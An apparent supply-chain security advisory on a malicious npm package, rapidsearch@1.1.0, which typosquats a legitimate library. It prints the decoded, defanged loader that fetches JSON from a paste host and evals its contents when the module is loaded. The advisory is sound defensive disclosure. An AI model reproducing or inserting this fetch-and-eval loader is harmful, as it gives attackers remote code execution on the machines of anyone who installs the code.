LWA-2026-4842 MAL-2026-6388 ↗ confirmed malware

rapidsearch@1.1.0

Malicious code in rapidsearch (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1071.001 · Web ProtocolsT1105 · Ingress Tool TransferT1102 · Web Service

Analysis

Package impersonates the legitimate rapidsearch library by mscdex ([account]) but is published by a different email ([account]) who also published the known typosquat multer-express. The main module lib/sbmh.js ships a base64-encoded string that decodes to `fetch('hxxps://jsonkeeper[.]com/b/9NXQ0').then(r=>r.json()).then(d=>{eval(d.ret);});`. This code runs at module load time (require()), fetches a JSON payload from jsonkeeper[.]com, and evals the '.ret' field — a remote code execution vector delivering an attacker-controlled second-stage payload from an external pastebin-like host.

analyzed by
Leitwacht
first seen
Jun 12, 2026, 07:38 PM
analyzed
Jun 12, 2026, 07:39 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.